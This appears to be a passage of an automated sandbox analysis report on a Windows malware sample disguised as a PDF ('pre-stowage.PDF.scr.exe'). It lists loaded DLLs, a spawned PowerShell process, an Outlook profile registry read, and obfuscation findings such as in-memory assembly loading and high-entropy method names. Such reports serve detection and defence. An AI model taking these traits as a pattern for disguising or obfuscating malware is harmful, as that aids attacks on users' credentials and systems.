                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: pre-stowage.PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: pre-stowage.PDF.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: pre-stowage.PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: DjCW.pdb source: pre-stowage.PDF.scr.exe
                Source: Binary string: DjCW.pdbSHA256 source: pre-stowage.PDF.scr.exe

                Data Obfuscation

                barindex
                Source: pre-stowage.PDF.scr.exe, Form11.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.pre-stowage.PDF.scr.exe.4074468.2.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.cs.Net Code: UBYctR4QVZ System.Reflection.Assembly.Load(byte[])
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.cs.Net Code: UBYctR4QVZ System.Reflection.Assembly.Load(byte[])
                Source: 0.2.pre-stowage.PDF.scr.exe.94b0000.5.raw.unpack, os6c027q4yBtMN9Rka.cs.Net Code: UBYctR4QVZ System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795DDE0 push eax; retf 0_2_0795DDE1
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 0_2_0795D5EA push esi; ret 0_2_0795D5ED
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF9C30 push esp; retf 010Fh4_2_00EF9D55
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF891E pushad ; iretd 4_2_00EF891F
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF8C2F pushfd ; iretd 4_2_00EF8C30
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeCode function: 4_2_00EF8DDF push esp; iretd 4_2_00EF8DE0
                Source: pre-stowage.PDF.scr.exeStatic PE information: section name: .text entropy: 7.655601029073059
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, jeEVGMbwFxUtIgFgKM.csHigh entropy of concatenated method names: 'HNNtglYej', 'K2GxRhRnt', 'XKqTNcZ5y', 'UYIjRVTeT', 'h3Yec80wk', 'RMD3NQhFa', 'fQmZRSIMAurtD5qnU5', 'tfQnoiiuNTFkjlkhpe', 'vxb6SiXPu', 'T4HymkN41'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UJx16k4wibYGBEee69.csHigh entropy of concatenated method names: 'v8a28Oai4t', 'AOY2pxsWcU', 'OGM2WMbJmR', 'P5s2syPyYk', 'Tpv2CMeAwu', 'sbG2qKkeb2', 'Cte4LnEgIZ4qHgAfBs', 'ckTCDgMPDlTXFC8byj', 'DxL22XHZTy', 'XhR2g953n3'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, n3YbDmHT2jVUifwuLy.csHigh entropy of concatenated method names: 'orBuMl5daL', 'XPNuS9BSB0', 'rLC6YMxURk', 'mou62PcfxV', 'uWYuHgbejA', 'smFuX1BbQS', 'jXKuILWL8x', 'S2uuLNZHf1', 'YNjuAVcfO5', 'CxjuixpLDb'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, opJUIm9UcyxBl5Yai1.csHigh entropy of concatenated method names: 'n6vCPdrNtE', 'UBSCXwOUGH', 'iHjCLRVrQB', 'JsxCAjPIOM', 'AZpCmPqph3', 'wlMCdwI850', 'xSGCQgPDLC', 'ijLCwusquh', 'N3hCnZRZvC', 't1MCV2bdaU'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, JAiuoQWeZCVY5sQiOM.csHigh entropy of concatenated method names: 'V7BFCy1q7s', 'o00FuyFfWH', 'tC9FFvqbdu', 'K2TF9STASS', 'EpiFautIJ4', 'qEwF7QlfYT', 'Dispose', 'iEK6Ky8AWs', 'M2v607gTWu', 'OTx6fRqZd2'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, ypTk0VpAB3YFXV3wNl.csHigh entropy of concatenated method names: 'dDnMKq2F9c12JC8T0H4', 'OQuqW42TlDgr76I1w7W', 'h6oN6fYZUW', 'mYkNFseUwu', 'r62NyZLBF6', 'WKIvPG2cDhj5qqA333o', 'af5nwZ2neOXIpAGKOxu'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, PmXsTUCDOgkMU8yksJ.csHigh entropy of concatenated method names: 'dOxNoUgvBn', 'NhoN0KXtpJ', 'P03NbBBUb9', 'PDQN8yuuDh', 'sPpNpYRaKe', 'hcBbEgIxYJ', 'wHCbvkBtN8', 'CrxbOnqYLq', 'v9kbMI1xaT', 'a6Zb5dekui'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, BEMj65tVslqGPIwBnf.csHigh entropy of concatenated method names: 'Dispose', 'F6Q25yDtoD', 'r0SJm3XaHn', 'KWhREHlU2U', 'ldb2SMIMlS', 'R4O2zHiWl8', 'ProcessDialogKey', 's9kJYc6R5Z', 'wwGJ2ftsj1', 'r5kJJ91WZW'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, UfFTqgYtsb6KTX3coT.csHigh entropy of concatenated method names: 'cIp0L354ZI', 'X0D0ASEdAj', 'TH80iqroyB', 'lqu0Ux5S3H', 'P4h0EWBnad', 'LIf0vAHAL7', 'BuD0OiDtrr', 'PlW0MAaWDr', 'wvY05xdchd', 'krm0SPEGZt'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, xb8rqfNfAIUnuW0mCg.csHigh entropy of concatenated method names: 'OyylrpNiaG', 'fEjleZi9Z0', 'lVNlGq0bSK', 'SJalmZXufJ', 'auJlQc4eU8', 'v56lwHjmE2', 'nIFlVyAI4C', 'b31l4bpA6A', 'uU8lP8tHU4', 'EZflHMVCSG'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, os6c027q4yBtMN9Rka.csHigh entropy of concatenated method names: 'RCxgoRSXgy', 'NolgKc0dv3', 'Xkbg0jT5v8', 'vKUgfCnZX3', 'Ws8gbFUryx', 'TNWgNhRrPc', 'm0Vg8WGcQy', 'RBcgpsnTqK', 'gP7gZ8gdWp', 'S97gWfOefD'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, QDGTI6wugRXuhhDQD6D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'POIyHhlZBW', 'TOuyXsyanY', 'ef0yIsgTtY', 'GfYyLFr1pH', 'fq2yAjpntc', 'llAyi8ed0c', 'iLfyUqqjxg'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, bCZYANwwpQ2r7u6mgpB.csHigh entropy of concatenated method names: 'dPQyS7xXOo', 'GHpyzoMBeG', 'nW49YncIbO', 't0192jUNTQ', 'ObR9JTpSuh', 'RaG9gqrAKJ', 'a7N9cb6dyo', 'apc9oNokWF', 'QGu9KAyfxq', 'BlB90AXKti'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, VLsxuBhnuaR0lNrC6k.csHigh entropy of concatenated method names: 'ToString', 'j0pqH3VvGt', 'Y77qmGH1Po', 'W3rqdefa8O', 'eR8qQux2Nx', 'VshqwTtWa6', 'xi3qndt99E', 'jWhqVuZssA', 'HYcq4XbgbQ', 'pVqqkE2QoX'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, lOJAEsscuiBpdmc6iC.csHigh entropy of concatenated method names: 'cxZyfCU65h', 'fMBybCJRPT', 'DGqyN6tEMC', 'ejry8nvcfv', 'oFJyFHwfnG', 'ebOypnqSjC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, OFjZs8w4IE7cY9fQFJk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oUrRFVk2t3', 'Ql8Ryw8GDW', 'x09R96nPrI', 'TqQRRieYgJ', 'YyeRaVNGGv', 'AFmRBQEwxP', 'lGYR7VMq7U'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, r5YwhfVYKOBjaNYsWF.csHigh entropy of concatenated method names: 'qv981D533I', 'JeD8hhyDE4', 'z1m8to2tNV', 'yJK8xQZoNl', 'O8j8DseaSN', 'ebh8ThcGCw', 'mYd8jVLGwI', 'UYh8rvD79K', 'DZq8eacTBB', 'VAR83DZ6d5'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, BW1XoG8aG2SQRRV2vI.csHigh entropy of concatenated method names: 'cAKuWXbHWE', 'nUgusq84th', 'ToString', 'faBuKkpvEW', 'B5Fu0yShrc', 'iJxufQFwED', 'F6WubTc3FB', 'aIQuNF2I8s', 'b89u8C3h2r', 'aLpupNVbwJ'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, KpCbpn3nRoLFMRTXIK.csHigh entropy of concatenated method names: 'ip6fx90Bqf', 'lkJfT3X34j', 'MrgfrY3Vyd', 'pqcferWTH1', 'BVtfCkpuPr', 'N68fqlCKjE', 'crefu3lnwi', 'MOCf6bKJ9Q', 'UGAfF4rZjC', 'EPkfy0DSVJ'
                Source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, As70r9koVQtCbi77sS.csHigh entropy of concatenated method names: 'imQFGVRHLd', 'S8UFmotGXR', 'JoQFdQgK4D', 'meLFQZuDf6', 'oATFwUG2Ks', 'XSuFnu9alB', 'UhjFV1Zqhn', 'OcwF4rSMEc', 'c9tFkng1wr', 'vkPFPMVtHG'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, jeEVGMbwFxUtIgFgKM.csHigh entropy of concatenated method names: 'HNNtglYej', 'K2GxRhRnt', 'XKqTNcZ5y', 'UYIjRVTeT', 'h3Yec80wk', 'RMD3NQhFa', 'fQmZRSIMAurtD5qnU5', 'tfQnoiiuNTFkjlkhpe', 'vxb6SiXPu', 'T4HymkN41'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UJx16k4wibYGBEee69.csHigh entropy of concatenated method names: 'v8a28Oai4t', 'AOY2pxsWcU', 'OGM2WMbJmR', 'P5s2syPyYk', 'Tpv2CMeAwu', 'sbG2qKkeb2', 'Cte4LnEgIZ4qHgAfBs', 'ckTCDgMPDlTXFC8byj', 'DxL22XHZTy', 'XhR2g953n3'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, n3YbDmHT2jVUifwuLy.csHigh entropy of concatenated method names: 'orBuMl5daL', 'XPNuS9BSB0', 'rLC6YMxURk', 'mou62PcfxV', 'uWYuHgbejA', 'smFuX1BbQS', 'jXKuILWL8x', 'S2uuLNZHf1', 'YNjuAVcfO5', 'CxjuixpLDb'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, opJUIm9UcyxBl5Yai1.csHigh entropy of concatenated method names: 'n6vCPdrNtE', 'UBSCXwOUGH', 'iHjCLRVrQB', 'JsxCAjPIOM', 'AZpCmPqph3', 'wlMCdwI850', 'xSGCQgPDLC', 'ijLCwusquh', 'N3hCnZRZvC', 't1MCV2bdaU'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, JAiuoQWeZCVY5sQiOM.csHigh entropy of concatenated method names: 'V7BFCy1q7s', 'o00FuyFfWH', 'tC9FFvqbdu', 'K2TF9STASS', 'EpiFautIJ4', 'qEwF7QlfYT', 'Dispose', 'iEK6Ky8AWs', 'M2v607gTWu', 'OTx6fRqZd2'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, ypTk0VpAB3YFXV3wNl.csHigh entropy of concatenated method names: 'dDnMKq2F9c12JC8T0H4', 'OQuqW42TlDgr76I1w7W', 'h6oN6fYZUW', 'mYkNFseUwu', 'r62NyZLBF6', 'WKIvPG2cDhj5qqA333o', 'af5nwZ2neOXIpAGKOxu'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, PmXsTUCDOgkMU8yksJ.csHigh entropy of concatenated method names: 'dOxNoUgvBn', 'NhoN0KXtpJ', 'P03NbBBUb9', 'PDQN8yuuDh', 'sPpNpYRaKe', 'hcBbEgIxYJ', 'wHCbvkBtN8', 'CrxbOnqYLq', 'v9kbMI1xaT', 'a6Zb5dekui'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, BEMj65tVslqGPIwBnf.csHigh entropy of concatenated method names: 'Dispose', 'F6Q25yDtoD', 'r0SJm3XaHn', 'KWhREHlU2U', 'ldb2SMIMlS', 'R4O2zHiWl8', 'ProcessDialogKey', 's9kJYc6R5Z', 'wwGJ2ftsj1', 'r5kJJ91WZW'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, UfFTqgYtsb6KTX3coT.csHigh entropy of concatenated method names: 'cIp0L354ZI', 'X0D0ASEdAj', 'TH80iqroyB', 'lqu0Ux5S3H', 'P4h0EWBnad', 'LIf0vAHAL7', 'BuD0OiDtrr', 'PlW0MAaWDr', 'wvY05xdchd', 'krm0SPEGZt'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, xb8rqfNfAIUnuW0mCg.csHigh entropy of concatenated method names: 'OyylrpNiaG', 'fEjleZi9Z0', 'lVNlGq0bSK', 'SJalmZXufJ', 'auJlQc4eU8', 'v56lwHjmE2', 'nIFlVyAI4C', 'b31l4bpA6A', 'uU8lP8tHU4', 'EZflHMVCSG'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, os6c027q4yBtMN9Rka.csHigh entropy of concatenated method names: 'RCxgoRSXgy', 'NolgKc0dv3', 'Xkbg0jT5v8', 'vKUgfCnZX3', 'Ws8gbFUryx', 'TNWgNhRrPc', 'm0Vg8WGcQy', 'RBcgpsnTqK', 'gP7gZ8gdWp', 'S97gWfOefD'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, QDGTI6wugRXuhhDQD6D.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'POIyHhlZBW', 'TOuyXsyanY', 'ef0yIsgTtY', 'GfYyLFr1pH', 'fq2yAjpntc', 'llAyi8ed0c', 'iLfyUqqjxg'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, bCZYANwwpQ2r7u6mgpB.csHigh entropy of concatenated method names: 'dPQyS7xXOo', 'GHpyzoMBeG', 'nW49YncIbO', 't0192jUNTQ', 'ObR9JTpSuh', 'RaG9gqrAKJ', 'a7N9cb6dyo', 'apc9oNokWF', 'QGu9KAyfxq', 'BlB90AXKti'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, VLsxuBhnuaR0lNrC6k.csHigh entropy of concatenated method names: 'ToString', 'j0pqH3VvGt', 'Y77qmGH1Po', 'W3rqdefa8O', 'eR8qQux2Nx', 'VshqwTtWa6', 'xi3qndt99E', 'jWhqVuZssA', 'HYcq4XbgbQ', 'pVqqkE2QoX'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, lOJAEsscuiBpdmc6iC.csHigh entropy of concatenated method names: 'cxZyfCU65h', 'fMBybCJRPT', 'DGqyN6tEMC', 'ejry8nvcfv', 'oFJyFHwfnG', 'ebOypnqSjC', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, OFjZs8w4IE7cY9fQFJk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oUrRFVk2t3', 'Ql8Ryw8GDW', 'x09R96nPrI', 'TqQRRieYgJ', 'YyeRaVNGGv', 'AFmRBQEwxP', 'lGYR7VMq7U'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, r5YwhfVYKOBjaNYsWF.csHigh entropy of concatenated method names: 'qv981D533I', 'JeD8hhyDE4', 'z1m8to2tNV', 'yJK8xQZoNl', 'O8j8DseaSN', 'ebh8ThcGCw', 'mYd8jVLGwI', 'UYh8rvD79K', 'DZq8eacTBB', 'VAR83DZ6d5'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, BW1XoG8aG2SQRRV2vI.csHigh entropy of concatenated method names: 'cAKuWXbHWE', 'nUgusq84th', 'ToString', 'faBuKkpvEW', 'B5Fu0yShrc', 'iJxufQFwED', 'F6WubTc3FB', 'aIQuNF2I8s', 'b89u8C3h2r', 'aLpupNVbwJ'
                Source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, KpCbpn3nRoLFMRTXIK.csHigh entropy of concatenated method names: 'ip6fx90Bqf', 'lkJfT3X34j', 'MrgfrY3Vyd', 'pqcferWTH1', 'BVtfCkpuPr', 'N68fqlCKjE', 'crefu3lnwi', 'MOCf6bKJ9Q', 'UGAfF4rZjC', 'EPkfy0DSVJ'
